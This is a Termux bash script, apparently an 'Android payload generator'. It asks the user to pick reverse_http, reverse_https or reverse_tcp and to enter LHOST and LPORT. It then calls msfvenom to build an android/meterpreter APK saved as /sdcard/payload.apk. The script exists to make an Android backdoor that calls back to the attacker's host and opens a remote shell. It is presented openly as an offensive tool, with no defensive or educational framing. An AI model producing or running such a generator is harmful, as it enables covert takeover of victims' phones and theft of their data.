#!/data/data/com.termux/files/usr/bin/bash

clear

echo 'Android payload generator ' |lolcat -a


option=0

while [ $option -ne 13 ]
do
	echo "*** Payload Options ***" |lolcat -a
	
	echo "1. reverse_http" |lolcat -a
	echo "2. reverse_https" |lolcat -a
	echo "3. reverse_tcp" |lolcat -a

	read -p "Select Payload > " option

	if [ $option -eq 1 ]
	then
		payload="reverse_http"
		option=13
	elif [ $option -eq 2 ]
	then
		payload="reverse_https"
		option=13
	elif [ $option -eq 3 ]
	then
		payload="reverse_tcp"
		option=13
	else
		clear
		echo "Invalid Option."  |lolcat -a
		option=0
	fi

done

echo 'Enter LHOST' |lolcat -a
read host

echo 'Enter LPORT' |lolcat -a
read port

echo "Generating Payload Please Wait..." |lolcat -a

~/metasploit-framework/msfvenom -p android/meterpreter/$payload LHOST=$host LPORT=$port --arch dalvik --platform android R > /sdcard/payload.apk |lolcat -a
